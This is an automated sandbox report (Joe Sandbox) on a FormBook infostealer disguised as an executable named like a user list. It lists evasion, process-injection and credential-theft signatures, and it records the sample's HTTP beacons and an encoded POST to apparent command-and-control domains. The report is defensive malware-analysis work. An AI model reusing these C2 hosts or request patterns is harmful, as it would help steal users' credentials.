Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
022QCX_End_User_List_2025.exe

Overview

General Information

Sample name:022QCX_End_User_List_2025.exe
Analysis ID:1596597
MD5:e8b4e24d64b7847a824fd0926101e7b7
SHA1:98fd37a4273d61f76a15f9d27938ce30bd8d4772
SHA256:b24a12ce8bd3fa70f4bd97cb2317775649568c1334ce6d6dd6f7cc7ea80c0b49
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 022QCX_End_User_List_2025.exe (PID: 6372 cmdline: "C:\Users\user\Desktop\022QCX_End_User_List_2025.exe" MD5: E8B4E24D64B7847A824FD0926101E7B7)
    • 022QCX_End_User_List_2025.exe (PID: 732 cmdline: "C:\Users\user\Desktop\022QCX_End_User_List_2025.exe" MD5: E8B4E24D64B7847A824FD0926101E7B7)
      • gJe493hPOgj2OnF5.exe (PID: 5084 cmdline: "C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\ID1pPz1dHhy4.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • secinit.exe (PID: 3752 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • gJe493hPOgj2OnF5.exe (PID: 3484 cmdline: "C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\no8ML3OTX6fe.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 5592 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2063942175.00000000011F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2942300801.0000000005680000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2058828430.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2938382440.0000000003080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.2940757113.0000000003670000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.022QCX_End_User_List_2025.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.022QCX_End_User_List_2025.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: 022QCX_End_User_List_2025.exeReversingLabs: Detection: 34%
                Source: 022QCX_End_User_List_2025.exeVirustotal: Detection: 27%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2063942175.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2942300801.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058828430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938382440.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940757113.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940659392.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2940387871.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2066777958.0000000001FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 022QCX_End_User_List_2025.exeJoe Sandbox ML: detected
                Source: 022QCX_End_User_List_2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 022QCX_End_User_List_2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2062338945.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939070736.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2064150805.0000000001270000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2067514851.0000000003722000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2058780129.000000000354B000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 022QCX_End_User_List_2025.exe, 022QCX_End_User_List_2025.exe, 00000002.00000002.2064150805.0000000001270000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000007.00000003.2067514851.0000000003722000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2058780129.000000000354B000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2062338945.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939070736.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: slZm.pdbSHA256 source: 022QCX_End_User_List_2025.exe
                Source: Binary string: slZm.pdb source: 022QCX_End_User_List_2025.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gJe493hPOgj2OnF5.exe, 00000006.00000000.1980832555.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000000.2137548095.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0309C750 FindFirstFileW,FindNextFileW,FindClose,7_2_0309C750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then xor eax, eax7_2_03089EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then mov ebx, 00000004h7_2_037D04E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /i9o2/?Gb=eeVMOLNT7Wv5dPd2abeY2s6wfV4z97Ojpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmLpxfYJ7GpaXG0AU5Q2hJ+YZECeKnaUmPKw=&c8h40=q8sx8pUX60 HTTP/1.1Host: www.physicsbrain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /s3u9/?Gb=UzjCSVSddvdCY8C1FJhZD3hzV3cx7V6VeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsNQ+DIbND6ryFzsAfnoTIAADRp566kYszBo=&c8h40=q8sx8pUX60 HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /sps0/?Gb=XJrqUIwA9BqFEGe78vIBE0G+BWiiclUka5W/N1g8G7k0/aUxIXiyzXPqBkPj84XroFellg4Bg0NpGuCwGUgLHXcXTFz0fq2LYjTTks2wxyXck/mKrQqUMNQ=&c8h40=q8sx8pUX60 HTTP/1.1Host: www.car-select.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /g9qz/?Gb=J9sRrZ4fqsb/1Q6DHg/horvKP/Y227PlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jViulyCGdG0mz9ZyUbW3XLJR78Ll+mTUZduw=&c8h40=q8sx8pUX60 HTTP/1.1Host: www.topked.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /5l58/?Gb=mzKLqUgWNSOc0HCmYD0eZB35mXOvxurDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy77YqYU9tnNrtZSFWdn4ViixqxAzw7XlvsxQ=&c8h40=q8sx8pUX60 HTTP/1.1Host: www.autonomousrich.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /eee1/?Gb=n9kO9VSsPKocZxgZzQNS6oD/2NdyhckYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+i+/kEtv5fcMwQaiykVTbVos+Dhavap1uoI=&c8h40=q8sx8pUX60 HTTP/1.1Host: www.corellia.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficDNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bydotoparca.net
                Source: global trafficDNS traffic detected: DNS query: www.car-select.online
                Source: global trafficDNS traffic detected: DNS query: www.topked.top
                Source: global trafficDNS traffic detected: DNS query: www.autonomousrich.xyz
                Source: global trafficDNS traffic detected: DNS query: www.corellia.pro
                Source: unknownHTTP traffic detected: POST /s3u9/ HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bydotoparca.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeReferer: http://www.bydotoparca.net/s3u9/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)Data Raw: 47 62 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 4b 35 57 2b 49 4a 4d 6d 46 46 6c 79 57 6a 49 45 79 68 36 64 53 57 2b 6c 35 72 51 6f 6a 48 76 62 64 50 2f 6a 6e 2f 57 59 75 72 2b 54 68 32 38 78 53 79 2b 67 76 67 6f 53 71 61 72 68 67 49 51 6a 42 55 79 35 42 6f 66 53 6e 39 6f 73 4a 35 36 52 49 2f 4f 4a 51 51 63 58 65 56 64 43 61 41 55 49 58 49 78 50 37 31 73 55 32 6e 37 62 4b 61 70 72 32 5a 44 30 30 6a 6c 6b 49 68 59 42 56 46 75 2f 68 54 52 34 79 57 75 42 73 38 35 59 50 34 6b 7a 34 52 50 41 6d 4a 48 56 74 36 78 6f 65 6c 32 56 41 32 30 56 61 67 57 61 36 36 32 66 74 6e 51 6e 44 77 38 37 6d 67 3d 3d Data Ascii: Gb=ZxLiRiqne9JwK5W+IJMmFFlyWjIEyh6dSW+l5rQojHvbdP/jn/WYur+Th28xSy+gvgoSqarhgIQjBUy5BofSn9osJ56RI/OJQQcXeVdCaAUIXIxP71sU2n7bKapr2ZD00jlkIhYBVFu/hTR4yWuBs85YP4kz4RPAmJHVt6xoel2VA20VagWa662ftnQnDw87mg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 22 Jan 2025 06:52:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-22T06:52:19.1841485Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Jan 2025 06:52:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Jan 2025 06:52:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Jan 2025 06:52:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Jan 2025 06:52:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Jan 2025 06:52:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Jan 2025 06:52:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Jan 2025 06:52:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not 